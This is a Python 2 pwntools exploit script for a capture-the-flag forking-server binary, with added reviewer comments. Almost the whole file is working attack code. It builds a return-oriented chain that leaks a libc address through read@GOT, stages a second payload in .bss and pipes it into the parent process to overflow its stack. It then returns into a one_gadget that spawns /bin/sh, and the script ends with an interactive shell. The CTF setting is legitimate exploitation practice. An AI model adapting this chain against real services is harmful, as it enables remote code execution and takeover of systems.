#!/usr/bin/env python
# CTF exploit (Python 2 / pwntools) for a forking server binary.
#
# Flow, as visible below: a first ROP chain sent to the child process
#   1. writes read@GOT to stdout (leaks a libc pointer, defeating ASLR),
#   2. reads a second payload from fd 0 into a .bss buffer,
#   3. writes that buffer into the server's pipe, which overflows the
#      parent's stack; the parent then returns into a libc one_gadget.
#
# Every address is hard-coded for this particular binary (gadgets at
# 0x400cxx, GOT at 0x6020xx, i.e. loaded at a fixed address) and for the
# bundled libc-2.27.so; the offsets will not transfer to any other build.
# NOTE(review): the chain depends on a readable GOT at a fixed address and
# on the leaked libc pointer — PIE and full RELRO would invalidate it.
from pwn import *
with context.quiet:
    # Run the target locally with the challenge's libc so the libc offsets
    # used further down (0x110070, 0x4f322) match what is actually loaded.
    p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'})
    # leak the read@GOT to de-randomize ASLR
    # write(1, read@GOT, 8)
    payload = p64(0x400cf3) # pop rdi; ret;   (0x400cf3 = the "5f" byte of "41 5f pop r15" at 0x400cf2)
    payload += p64(0x1) # stdout
    payload += p64(0x400cf1) # pop rsi; pop r15; ret;   (same trick: tail byte of "41 5e pop r14")
    payload += p64(0x602058) # read@GOT
    payload += p64(0x0) # r15
    # 0x400890: the author labels this write@GOT, but 0x4008xx is in the
    # binary's code/PLT range, not the 0x6020xx GOT, so this is presumably
    # write@plt (the call target) — verify against the binary.
    payload += p64(0x400890) # write@GOT
    # Disassembly of the __libc_csu_init-style gadget pair used next: the
    # "mov ...; call [r12+rbx*8]" loop at 0x400cd0 and the pop sled at 0x400cea.
    '''
400cd0: 4c 89 fa mov rdx,r15
400cd3: 4c 89 f6 mov rsi,r14
400cd6: 44 89 ef mov edi,r13d
400cd9: 41 ff 14 dc call QWORD PTR [r12+rbx*8]
400cdd: 48 83 c3 01 add rbx,0x1
400ce1: 48 39 dd cmp rbp,rbx
400ce4: 75 ea jne 400cd0 <fork@plt+0x3a0>
400ce6: 48 83 c4 08 add rsp,0x8
400cea: 5b pop rbx
400ceb: 5d pop rbp
400cec: 41 5c pop r12
400cee: 41 5d pop r13
400cf0: 41 5e pop r14
400cf2: 41 5f pop r15
400cf4: c3 ret
    '''
    # read the second payload and put it in the .bss
    # read(fd, .bss, 0x80)
    payload += p64(0x400cea) # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
    payload += p64(0x0) # rbx = 0
    payload += p64(0x1) # rbp = 1 (in order to pass the "add rbx, 0x1; cmp rbp, rbx")
    payload += p64(0x602058) # r12 == 0x602058 (read's GOT) in order to meet "r12 + rbx * 8 == 0x602058"
    payload += p64(0x0) # r13 == rdi == fd == 0
    payload += p64(0x602200) # r14 == rsi == .bss address == 0x602200
    payload += p64(0x80) # r15 == rdx == 0x80 (size)
    payload += p64(0x400cd0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call QWORD PTR [r12+rbx*8] ...
    # After the call returns, rbx becomes 1 == rbp so the loop falls through to
    # "add rsp,0x8" plus six pops: 7 qwords are consumed before the final ret.
    payload += p64(0x0) * 7 # garbage until reach the ret
    # write the second payload to pipe which causes stack overflow in the parent process
    # write(pipe_fd, .bss, 0x80)
    payload += p64(0x400cf3) # pop rdi; ret;
    payload += p64(0x6) # pipe_fd   (fd number assumed from the server's fd layout — verify)
    payload += p64(0x400cf1) # pop rsi; pop r15; ret;
    # rsi = the .bss buffer (0x602200) filled by the read() above; the original
    # comment said "read@GOT", which is inconsistent with the value used here.
    payload += p64(0x602200) # read@GOT
    payload += p64(0x0) # r15
    payload += p64(0x400890) # write@GOT   (same address as above; see note there)
    # overwrite return address of child process
    # The flag-shaped prefix and 16 NUL bytes are presumably the input the
    # program expects plus padding up to the saved return address — confirm
    # against the binary's stack layout.
    p.send('ASIS{N0T_R34LLY_4_FL4G}\x00' + '\x00' * 16 + payload)
    # Skip the program's own output; the 8 leaked bytes follow this marker.
    p.recvuntil('something: Yeah tha')
    # find the libc base using the leaked read@GOT
    # 0x110070 is taken to be the offset of read() in the bundled libc-2.27.so.
    libc_base = u64(p.recv(8)) - 0x110070
    print 'libc base: {}'.format(hex(libc_base))
    # one_gadget output for this libc; the constraint must hold at the time
    # the parent returns into it.
    '''
0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
    '''
    one_gadget = libc_base + 0x4f322
    print 'one gadget: {}'.format(hex(one_gadget))
    # overwrite the return address in the parent process
    # This is the second payload: the child reads it into .bss and forwards it
    # through the pipe, where the parent's handler overflows its stack frame.
    p.sendline('TRANSMISSION_OVER\x00' + '\x00' * 22 + p64(one_gadget))
    p.interactive()